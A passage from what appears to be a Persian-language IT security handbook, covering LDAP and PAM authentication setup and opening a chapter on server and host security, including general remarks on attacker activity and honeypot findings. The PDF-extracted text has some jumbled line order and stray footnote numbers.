ﺩﺍﺩﻩ LDAPﺑﺠﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺤﻠﻲ ،NIS ،ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻗﺒﻞ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺗﻮﺍﺑـﻊ ﺭﺍ ﺑـﺮﺍﻱ
١٨٧
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻓﺎﻳﻞ ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﺳﺮﻭﻳﺲ) ١٨٦ﻣﻌﻤﻮ ﹰﻻ (/etc/nsswitch.confﻣﺠﺎﺯ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ.
ﺭﻭﺵ ﺩﻭﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼـﺎﺭﭼﻮﺏ PAMﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﺑﺤـﺚ ﻣـﻲﺷـﻮﺩ .ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ LDAPﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣـﺎﺟﻮﻝ ،PAM
،pam_ldapﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺧﻼﻑ pam_ldap ،libnss_ldapﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ LDAPﺗﻨﻬﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺩﻳﮕـﺮﻱ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻧﻤـﻲﻧﻤﺎﻳـﺪ .ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ LDAPﺷـﻤﺎ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ﻲ ﺍﺿـﺎﻓﻪ nis.schemaﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ LDAPﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻛﻨﺘﺮﻝﺷﺪﻩ ﺑﻮﺳـﻴﻠﺔ ،PAMﺑـﻪ ﺳـﺎﺩﮔ ﹺ
ﻛﺮﺩﻥ ﻳﻚ ﺧﻂ ﺑﻪ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺁﻥ ﺍﺳﺖ ،ﻛﻪ pam_ldap.soﺭﺍ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ،ﻭ
ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺑﻌﻨﻮﺍﻥ "ﻛﺎﻓﻲ" ﻣﺸﺨﺺ ﻛﻨﺪ.
LDAP؛ •
Kerberos 4ﻳﺎ Kerberos 5؛ ﻭ •
١٨٩
ﻳﻚ ﻓﺎﻳﻞ ﺩﻟﺨﻮﺍﻩ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ .Berkeley •
ﻫﺮ ﺳﺮﻭﻳﺲ ﺁﺷﻨﺎ ﺑﺎ PAMﻳﺎ ﺩﺭ ﻓﺎﻳﻞ /etc/pam.confﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻣﻌﻤﻮﻝﺗﺮ ﺩﺭ ﻓﺎﻳﻞ ﺧﻮﺩﺵ ﺩﺭ ﻣﺴﻴﺮ /etc/pam.dﭘﻴﻜﺮﺑﻨـﺪﻱ
ﻣﻲﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ sshﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ،Linuxﻓﺎﻳـﻞ /etc/pam.d/sshdﺍﺳـﺖ.
ﻳﻚ ﺳﺮﻭﻳﺲ ﺑﻨﺎﻡ " "otherﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺑﻪ ﺧﺪﻣﺎﺕ ﺁﺷﻨﺎ ﺑﺎ PAMﻛﻪ ﺻﺮﺍﺣﺘﹰﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩﺍﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺫﻳـ ﹰ
ﻼ ﻣﺜـﺎﻟﻲ
ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ PAMﺑﺮﺍﻱ sshdﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Linuxﺁﻣﺪﻩ ﺍﺳﺖ:
۱۸۹ﺍﮔﺮ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ ،ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ SMTPﺩﺭ Sendmailﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻨﺪﻭﻗﻬﺎﻱ ﭘـﺴﺘﻲ
simple authentication and ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ،Cyrus imapdﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ) Cyrus SASLﻻﻳـﺔ ﺳـﺎﺩﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ ﺍﻣﻨﻴـﺖ،
(security layerﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺠﺰﺍ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ PAMﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ! ﻏﻴﺮﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﻴﺴﺖ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺗﺼﺎﻝ imapﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ SASLﻣﺒﺘﻨﻲ ﺑﺮ PAMﻣﺒﺘﻨﻲ ﺑﺮ LDAPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٤٦
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ.
PAMﺑﻪ ﺭﺍﻫﺒﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺘﺨﺎﺏ ﺳﻴﺎﺳﺖ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻧﺤﻮ ،ﻣﺨﺎﻃﺮﻩ ﻭ ﻓﻨﺎﻭﺭﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺗﻄﺒﻴـﻖ
ﺩﻫﺪ.
- PAMﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﺭﻭﺷﻦ ﻛﺮﺩﻧﺪ -ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻫﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺻﺮﻓﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ .ﻳﻜـﻲ ﺍﺯ ﻧﻘـﺎﻁ
ﻗﻮﺕ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺭﻭﺷﻨﻲ ﭼﻬﺎﺭ ﻓﺎﺯ ﻭ ﺭﻭﺍﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ :ﺍﺭﺯﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺳﺮﻭﻳﺲ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﺩﺭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﻭ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺩﺍﺭﺩ )ﻓـﺎﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ( ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ )ﻓـﺎﺯ ﺗـﺼﺪﻳﻖ(،
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﺳﺎﻳﺮ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﺑﺎﺷﺪ )ﻓﺎﺯ ﺭﻣﺰ ﻋﺒﻮﺭ( ،ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻭ ﺍﺯ ﻛـﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ
ﻧﺸﺴﺖ ﻛﺎﺭﺑﺮ )ﻓﺎﺯ ﻧﺸﺴﺖ( ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﻭ ﺍﻳﺠﺎﺩ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﻣﻤﻴﺰﻱ ﻫﻢ ﺑﺎﺷﺪ.
۱۹۰ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺍﻳﻦ ﻳﻚ ﻣﺴﺌﻠﻪ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ .ﺍﻳﻦ ﺭﻭﺵ ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻔﺎﻭﺕ ﺗﺨﺼﻴﺺ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ
ﻣﻔﻴﺪ ﺑﺎﺷﺪ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻫﺮ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺩﻭ ﻧﻔﺮ ﻳﺎ ﺑﻴﺸﺘﺮ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺩﻧﺒﺎﻟﻪ "ﺷﺎﻫﺪ ﺑﻮﺩﻥ" ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ.
٣٤٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺷﺸﻢ
ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻛﻠﻴﺎﺕ
ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺼﻮﺭﺕ ﻋـﺎﻡ ،ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺳـﺖ ﻛـﻪ ﻣﻴﺰﺑـﺎﻧﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ ﻭ ﺍﻳـﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ ﻭ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ
ﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻴﻢ .ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ ١٩١ﻭ ﺳﭙﺲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘ ﹺ
ﭘﺴﺘﻲ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺎﻳﻞ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ،ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ.
ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﺍﻳﻤـﻦ
ﻧﻤﻲﻛﻨﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻫﻨﻮﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ ﻛﻪ ﺑﺴﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺣﺪﺱﺯﺩﻥ ﻫﺴﺘﻨﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑﺮﺍﺣﺘـﻲ
ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ١٩٢ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﻧﺪ.
ﺍﻣﺮﻭﺯﻩ ﻫﺰﺍﺭﺍﻥ ﮔﺮﻭﻩ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻭ ﻧﻴﻤﻪﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ
ﺭﻭﺷﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﺒﺎﺩﻟﻪ ﻣﻲﻛﻨﻨﺪ؛ ﻓﻨﻮﻥ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻣﻞ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ،ﺻﻔﺤﺎﺕ ﻭﺏ ،ﻭ ﮔﻔﺘﮕﻮﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ) ١٩٣(IRCﺩﺭ ﺣﺪ ﻭﺳﻴﻌﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ،ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪ ﺍﻣﻨﻴﺘﻲ )ﺩﻳﺪﺑﺎﻧﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ،١٩٤ﻓﺎﻳﻠﻬﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ،ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ( ﻧﻴﺰ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ ﺑﺮﺍﻱ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ
ﺐ ﻭﺍﺭﺩﻩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﺗـﺼﺎﻻﺕ ﭘﺮﺳـﺮﻋﺖ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﺁﺳﻴ ﹺ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﻋﺮﺽ ﻣﺪﺕﺯﻣﺎﻥ ﻛﻮﺗﺎﻫﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﭘﻮﻳﺶ ﻛﻨﻨﺪ.
ﭘﺮﻭﮊﺓ ﻛﻮﺯﺓ ﻋﺴﻞ (http://project.honypot.org/) ١٩٥ﻳﻚ ﭘﺮﻭﮊﺓ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺯﺍﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ
ﻼ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺑﺮﺭﺳﻲ ﺳﺮﻋﺖ ﺍﻧﺠﺎﻡ ﺣﻤﻠﻪ ﺑﻪ ﺁﻧﻬﺎ ،ﮔﺴﺘﺮﺩﮔﻲ ﺟﺎﻣﻌﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻛﻨﺪ .ﻧﺘـﺎﻳﺞ ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﺍﺻـ ﹰ
ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨﺪﻩ ﻧﻴﺴﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ۲۰۰۱ﺍﻋﻼﻡ ﺷﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻳﺎﻓﺘﻪﻫﺎﻱ ﺍﻳﻦ ﭘﺮﻭﮊﻩ ،ﻳﻚ ﺳﻴـﺴﺘﻢ Red Hat 6.2ﺍﺯ
ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ ،ﺑﻄﻮﺭ ﻣﺘﻮﺳﻂ ﭘﺲ ﺍﺯ ﺗﻨﻬﺎ ۷۲ﺳﺎﻋﺖ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻭ ﺑﺎ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻧﻔـﻮﺫ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﻣـﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ .ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻌﻤﻮﻟﻲ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺭﻭﺯ ﺑﺎﺭﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﭘﻮﻳﺶ ﻣﻲﺷﻮﺩ .ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ
ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windows 98ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ )ﻳﻜﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﺑﺮﺍﻱ ﻋﻤﺪﺓ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ( ﺩﺭ ﺁﻧﻬـﺎ
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ
ﺧﻄﻮﻁ ﻗﺮﻣﺰ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﺎ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ،ﻫﺮ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﻧﺼﺐ ﻛﻨﺪ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﻭﺏ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺩﺭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ،ﻛﺎﺭﺑﺮﺍﻥ ﺣﺘـﻲ ﺑـﺮﺍﻱ ﺭﺅﻳـﺖ ﺻـﻔﺤﺎﺕ ﻭﺏ ﻧﻴـﺰ ﺑـﻪ
ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﻳﺎ ﺧﺎﻣﻮﺵ ﻛﻨـﺪ؛ ﺩﺭﺣﺎﻟﻴﻜـﻪ
